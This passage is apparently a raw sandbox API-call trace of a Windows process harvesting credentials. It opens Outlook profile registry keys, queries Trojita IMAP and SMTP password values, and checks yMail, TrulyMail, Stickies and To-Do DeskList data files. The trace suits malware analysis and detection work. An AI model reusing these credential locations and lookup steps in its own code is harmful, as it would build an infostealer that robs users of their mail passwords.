0x63beb8 [0065.027] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0065.027] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x63beb8, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x63beb8, pcbData=0x19f6f0*=0x208) returned 0x2 [0065.027] GetProcessHeap () returned 0x620000 [0065.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63beb8 | out: hHeap=0x620000) returned 1 [0065.030] GetProcessHeap () returned 0x620000 [0065.030] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f4a) returned 0x63cbb8 [0065.030] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0065.031] wvsprintfW (in: param_1=0x63cbb8, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f35c115766b7c94cb080da6869ae8f9d") returned 88 [0065.031] GetProcessHeap () returned 0x620000 [0065.031] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb4) returned 0x63a478 [0065.031] GetProcessHeap () returned 0x620000 [0065.032] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63cbb8 | out: hHeap=0x620000) returned 1 [0065.032] GetProcessHeap () returned 0x620000 [0065.032] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b550 [0065.032] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0065.033] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f35c115766b7c94cb080da6869ae8f9d", phkResult=0x63b550 | out: phkResult=0x63b550*=0x204) returned 0x0 [0065.033] GetProcessHeap () returned 0x620000 [0065.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63beb8 [0065.033] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0065.034] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x63beb8, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0065.034] GetProcessHeap () returned 0x620000 [0065.034] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63beb8 | out: hHeap=0x620000) returned 1 [0065.035] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0065.035] RegCloseKey (hKey=0x204) returned 0x0 [0065.035] GetProcessHeap () returned 0x620000 [0065.035] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b550 | out: hHeap=0x620000) returned 1 [0065.035] GetProcessHeap () returned 0x620000 [0065.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0065.036] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0065.037] RegCloseKey (hKey=0x210) returned 0x0 [0065.037] GetProcessHeap () returned 0x620000 [0065.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b5b0 | out: hHeap=0x620000) returned 1 [0065.037] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0065.037] SHEnumKeyExW (in: hkey=0x218, dwIndex=0xd, pszName=0x63baa0, pcchName=0x19fb7c | out: pszName="f86ed2903a4a11cfb57e524153480001", pcchName=0x19fb7c) returned 0x0 [0065.037] GetProcessHeap () returned 0x620000 [0065.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b630 [0065.038] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0065.038] RegOpenKeyW (in: hKey=0x218, lpSubKey="f86ed2903a4a11cfb57e524153480001", phkResult=0x63b630 | out: phkResult=0x63b630*=0x210) returned 0x0 [0065.038] GetProcessHeap () returned 0x620000 [0065.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63beb8 [0065.039] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0065.039] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x63beb8, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x63beb8, pcbData=0x19f6f0*=0x208) returned 0x2 [0065.039] GetProcessHeap () returned 0x620000 [0065.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63beb8 | out: hHeap=0x620000) returned 1 [0065.040] GetProcessHeap () returned 0x620000 [0065.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f4a) returned 0x63cbb8 [0065.040] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0065.041] wvsprintfW (in: param_1=0x63cbb8, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001") returned 88 [0065.041] GetProcessHeap () returned 0x620000 [0065.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb4) returned 0x63a478 [0065.041] GetProcessHeap () returned 0x620000 [0065.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63cbb8 | out: hHeap=0x620000) returned 1 [0065.041] GetProcessHeap () returned 0x620000 [0065.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b5b0 [0065.042] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0065.042] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", phkResult=0x63b5b0 | out: phkResult=0x63b5b0*=0x204) returned 0x0 [0065.042] GetProcessHeap () returned 0x620000 [0065.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63beb8 [0065.043] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0065.043] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x63beb8, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0065.043] GetProcessHeap () returned 0x620000 [0065.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63beb8 | out: hHeap=0x620000) returned 1 [0065.044] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0065.045] RegCloseKey (hKey=0x204) returned 0x0 [0065.045] GetProcessHeap () returned 0x620000 [0065.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b5b0 | out: hHeap=0x620000) returned 1 [0065.045] GetProcessHeap () returned 0x620000 [0065.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0065.046] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0065.046] RegCloseKey (hKey=0x210) returned 0x0 [0065.046] GetProcessHeap () returned 0x620000 [0065.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b630 | out: hHeap=0x620000) returned 1 [0065.047] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0065.047] SHEnumKeyExW (in: hkey=0x218, dwIndex=0xe, pszName=0x63baa0, pcchName=0x19fb7c | out: pszName="", pcchName=0x19fb7c) returned 0x103 [0065.047] GetProcessHeap () returned 0x620000 [0065.047] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63baa0 | out: hHeap=0x620000) returned 1 [0065.048] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0065.048] RegCloseKey (hKey=0x218) returned 0x0 [0065.048] GetProcessHeap () returned 0x620000 [0065.048] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4d0 | out: hHeap=0x620000) returned 1 [0065.048] GetProcessHeap () returned 0x620000 [0065.049] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0065.049] GetProcessHeap () returned 0x620000 [0065.049] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62b518 | out: hHeap=0x620000) returned 1 [0065.049] GetProcessHeap () returned 0x620000 [0065.049] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a6e0 [0065.049] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0065.050] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x63a6e0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0065.050] GetProcessHeap () returned 0x620000 [0065.050] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f64) returned 0x63cbb8 [0065.050] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0065.051] wvsprintfW (in: param_1=0x63cbb8, param_2="%s\\yMail2\\POP3.xml", arglist=0x19fae8 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail2\\POP3.xml") returned 47 [0065.051] GetProcessHeap () returned 0x620000 [0065.051] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x62) returned 0x63a8f0 [0065.051] GetProcessHeap () returned 0x620000 [0065.051] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63cbb8 | out: hHeap=0x620000) returned 1 [0065.052] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0065.052] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail2\\POP3.xml") returned 0 [0065.052] GetProcessHeap () returned 0x620000 [0065.053] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a8f0 | out: hHeap=0x620000) returned 1 [0065.053] GetProcessHeap () returned 0x620000 [0065.053] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a6e0 | out: hHeap=0x620000) returned 1 [0065.053] GetProcessHeap () returned 0x620000 [0065.053] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a6e0 [0065.054] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0065.054] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x63a6e0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0065.054] GetProcessHeap () returned 0x620000 [0065.054] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f64) returned 0x63cbb8 [0065.055] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0065.055] wvsprintfW (in: param_1=0x63cbb8, param_2="%s\\yMail2\\SMTP.xml", arglist=0x19fadc | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail2\\SMTP.xml") returned 47 [0065.055] GetProcessHeap () returned 0x620000 [0065.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x62) returned 0x63a8f0 [0065.055] GetProcessHeap () returned 0x620000 [0065.056] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63cbb8 | out: hHeap=0x620000) returned 1 [0065.056] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0065.057] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail2\\SMTP.xml") returned 0 [0065.057] GetProcessHeap () returned 0x620000 [0065.057] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a8f0 | out: hHeap=0x620000) returned 1 [0065.057] GetProcessHeap () returned 0x620000 [0065.057] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a6e0 | out: hHeap=0x620000) returned 1 [0065.057] GetProcessHeap () returned 0x620000 [0065.057] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a6e0 [0065.058] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0065.058] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x63a6e0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0065.058] GetProcessHeap () returned 0x620000 [0065.058] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f6c) returned 0x63cbb8 [0065.060] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0065.061] wvsprintfW (in: param_1=0x63cbb8, param_2="%s\\yMail2\\Accounts.xml", arglist=0x19fad0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail2\\Accounts.xml") returned 51 [0065.061] GetProcessHeap () returned 0x620000 [0065.061] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x6a) returned 0x63a8f0 [0065.061] GetProcessHeap () returned 0x620000 [0065.061] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63cbb8 | out: hHeap=0x620000) returned 1 [0065.062] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0065.062] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail2\\Accounts.xml") returned 0 [0065.062] GetProcessHeap () returned 0x620000 [0065.063] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a8f0 | out: hHeap=0x620000) returned 1 [0065.063] GetProcessHeap () returned 0x620000 [0065.063] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a6e0 | out: hHeap=0x620000) returned 1 [0065.063] GetProcessHeap () returned 0x620000 [0065.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a6e0 [0065.064] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0065.064] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x63a6e0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0065.064] GetProcessHeap () returned 0x620000 [0065.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f64) returned 0x63cbb8 [0065.064] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0065.065] wvsprintfW (in: param_1=0x63cbb8, param_2="%s\\yMail\\ymail.ini", arglist=0x19fac4 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail\\ymail.ini") returned 47 [0065.065] GetProcessHeap () returned 0x620000 [0065.065] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x62) returned 0x63a8f0 [0065.065] GetProcessHeap () returned 0x620000 [0065.066] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63cbb8 | out: hHeap=0x620000) returned 1 [0065.066] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0065.066] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail\\ymail.ini") returned 0 [0065.066] GetProcessHeap () returned 0x620000 [0065.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a8f0 | out: hHeap=0x620000) returned 1 [0065.067] GetProcessHeap () returned 0x620000 [0065.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a6e0 | out: hHeap=0x620000) returned 1 [0065.067] GetProcessHeap () returned 0x620000 [0065.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e8) returned 0x63b6b0 [0065.067] GetProcessHeap () returned 0x620000 [0065.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x62b740 [0065.067] GetProcessHeap () returned 0x620000 [0065.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63baa0 [0065.068] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0065.068] SHGetValueW (in: hkey=0x80000001, pszSubKey="SOFTWARE\\flaska.net\\trojita", pszValue="imap.auth.pass", pdwType=0x0, pvData=0x63baa0, pcbData=0x19fa1c*=0x104 | out: pdwType=0x0, pvData=0x63baa0, pcbData=0x19fa1c*=0x104) returned 0x2 [0065.068] GetProcessHeap () returned 0x620000 [0065.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63baa0 | out: hHeap=0x620000) returned 1 [0065.068] GetProcessHeap () returned 0x620000 [0065.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63baa0 [0065.069] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0065.069] SHGetValueW (in: hkey=0x80000001, pszSubKey="SOFTWARE\\flaska.net\\trojita", pszValue="msa.smtp.auth.pass", pdwType=0x0, pvData=0x63baa0, pcbData=0x19fa1c*=0x104 | out: pdwType=0x0, pvData=0x63baa0, pcbData=0x19fa1c*=0x104) returned 0x2 [0065.069] GetProcessHeap () returned 0x620000 [0065.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63baa0 | out: hHeap=0x620000) returned 1 [0065.070] GetProcessHeap () returned 0x620000 [0065.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0065.070] GetProcessHeap () returned 0x620000 [0065.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62b740 | out: hHeap=0x620000) returned 1 [0065.070] GetProcessHeap () returned 0x620000 [0065.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8c) returned 0x63cbb8 [0065.071] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0065.071] wvsprintfW (in: param_1=0x63cbb8, param_2="%s\\TrulyMail\\Data\\Settings\\user.config", arglist=0x19fb40 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\TrulyMail\\Data\\Settings\\user.config") returned 73 [0065.071] GetProcessHeap () returned 0x620000 [0065.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x96) returned 0x63a478 [0065.071] GetProcessHeap () returned 0x620000 [0065.072] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63cbb8 | out: hHeap=0x620000) returned 1 [0065.073] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0065.073] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\TrulyMail\\Data\\Settings\\user.config") returned 0 [0065.073] GetProcessHeap () returned 0x620000 [0065.073] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0065.073] GetProcessHeap () returned 0x620000 [0065.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x12c) returned 0x63a478 [0065.073] GetProcessHeap () returned 0x620000 [0065.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x62b740 [0065.073] GetProcessHeap () returned 0x620000 [0065.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a6e0 [0065.074] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0065.084] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x63a6e0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0065.085] Sleep (dwMilliseconds=0xa) [0065.119] GetProcessHeap () returned 0x620000 [0065.119] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f4a) returned 0x63cbb8 [0065.119] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0065.120] wvsprintfW (in: param_1=0x63cbb8, param_2="%s\\%s", arglist=0x19f8fc | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.spn") returned 37 [0065.120] GetProcessHeap () returned 0x620000 [0065.120] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4e) returned 0x63a8f0 [0065.120] GetProcessHeap () returned 0x620000 [0065.121] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63cbb8 | out: hHeap=0x620000) returned 1 [0065.121] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.spn" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\*.spn"), lpFindFileData=0x19f910 | out: lpFindFileData=0x19f910*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x207d0, ftCreationTime.dwHighDateTime=0x20000, ftLastAccessTime.dwLowDateTime=0x48, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x627960, ftLastWriteTime.dwHighDateTime=0x627960, nFileSizeHigh=0x6340e0, nFileSizeLow=0x634658, dwReserved0=0x0, dwReserved1=0x19f96c, cFileName="ը睹", cAlternateFileName="뒭蕬͈읩愫"ﭴ\x19䂑@")) returned 0xffffffff [0065.121] GetProcessHeap () returned 0x620000 [0065.122] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a8f0 | out: hHeap=0x620000) returned 1 [0065.122] GetProcessHeap () returned 0x620000 [0065.122] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a6e0 | out: hHeap=0x620000) returned 1 [0065.122] GetProcessHeap () returned 0x620000 [0065.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a6e0 [0065.123] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0065.123] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x63a6e0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x0 [0065.124] Sleep (dwMilliseconds=0xa) [0065.152] GetProcessHeap () returned 0x620000 [0065.152] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f4a) returned 0x63cbb8 [0065.153] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0065.153] wvsprintfW (in: param_1=0x63cbb8, param_2="%s\\%s", arglist=0x19f8e4 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.spn") returned 35 [0065.154] GetProcessHeap () returned 0x620000 [0065.154] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4a) returned 0x63a8f0 [0065.154] GetProcessHeap () returned 0x620000 [0065.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63cbb8 | out: hHeap=0x620000) returned 1 [0065.154] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.spn" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\*.spn"), lpFindFileData=0x19f8f8 | out: lpFindFileData=0x19f8f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x207d0, ftCreationTime.dwHighDateTime=0x20000, ftLastAccessTime.dwLowDateTime=0x48, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x627960, ftLastWriteTime.dwHighDateTime=0x627960, nFileSizeHigh=0x6340e0, nFileSizeLow=0x634460, dwReserved0=0x0, dwReserved1=0x19f954, cFileName="ը睹", cAlternateFileName="⦰螚䇆愳"ﭜ\x19䂑@")) returned 0xffffffff [0065.155] GetProcessHeap () returned 0x620000 [0065.155] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a8f0 | out: hHeap=0x620000) returned 1 [0065.155] GetProcessHeap () returned 0x620000 [0065.156] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a6e0 | out: hHeap=0x620000) returned 1 [0065.156] GetProcessHeap () returned 0x620000 [0065.156] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0065.157] GetProcessHeap () returned 0x620000 [0065.157] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62b740 | out: hHeap=0x620000) returned 1 [0065.157] GetProcessHeap () returned 0x620000 [0065.157] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f74) returned 0x63cbb8 [0065.157] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0065.158] wvsprintfW (in: param_1=0x63cbb8, param_2="%s\\To-Do DeskList\\tasks.db", arglist=0x19fb5c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\To-Do DeskList\\tasks.db") returned 61 [0065.158] GetProcessHeap () returned 0x620000 [0065.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7e) returned 0x63a478 [0065.158] GetProcessHeap () returned 0x620000 [0065.159] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63cbb8 | out: hHeap=0x620000) returned 1 [0065.160] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0065.160] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\To-Do DeskList\\tasks.db") returned 0 [0065.161] GetProcessHeap () returned 0x620000 [0065.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0065.162] GetProcessHeap () returned 0x620000 [0065.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x12c) returned 0x63a478 [0065.162] GetProcessHeap () returned 0x620000 [0065.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x62b4d0 [0065.162] GetProcessHeap () returned 0x620000 [0065.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a6e0 [0065.162] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0065.163] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x63a6e0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0065.163] GetProcessHeap () returned 0x620000 [0065.163] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f64) returned 0x63cbb8 [0065.164] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0065.164] wvsprintfW (in: param_1=0x63cbb8, param_2="%s\\stickies\\images", arglist=0x19fb24 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\stickies\\images") returned 53 [0065.164] GetProcessHeap () returned 0x620000 [0065.164] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x6e) returned 0x63a8f0 [0065.164] GetProcessHeap () returned 0x620000 [0065.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63cbb8 | out: hHeap=0x620000) returned 1 [0065.166] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0065.166] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\stickies\\images") returned 0 [0065.167] GetProcessHeap () returned 0x620000 [0065.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a6e0 | out: hHeap=0x620000) returned 1 [0065.167] GetProcessHeap () returned 0x620000 [0065.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a8f0 | out: hHeap=0x620000) returned 1 [0065.167] GetProcessHeap () returned 0x620000 [0065.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a6e0 [0065.168] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0065.170] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x63a6e0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0065.170] GetProcessHeap () returned 0x620000 [0065.170] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f5e) returned 0x63cbb8 [0065.171] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0065.172] wvsprintfW (in: param_1=0x63cbb8, param_2="%s\\stickies\\rtf", arglist=0x19fb0c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\stickies\\rtf") returned 50 [0065.172] GetProcessHeap () returned 0x620000 [0065.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x68) returned 0x63a8f0 [0065.172] GetProcessHeap () returned 0x620000 [0065.172] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63cbb8 | out: hHeap=0x620000) returned 1 [0065.173] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0065.173] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\stickies\\rtf") returned 0 [0065.173] GetProcessHeap () returned 0x620000 [0065.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a6e0 | out: hHeap=0x620000) returned 1 [0065.173] GetProcessHeap () returned 0x620000 [0065.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a8f0 | out: hHeap=0x620000) returned 1 [0065.174] GetProcessHeap () returned 0x620000 [0065.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0065.174] GetProcessHeap () returned 0x620000 [0065.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62b4d0 | out: hHeap=0x620000) returned 1 [0065.174] GetProcessHeap () returned 0x620000 [0065.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x12c) returned 0x63a478 [0065.174] GetProcessHeap () returned 0x620000 [0065.174] RtlAllocateHeap (HeapHandle=0x620000, 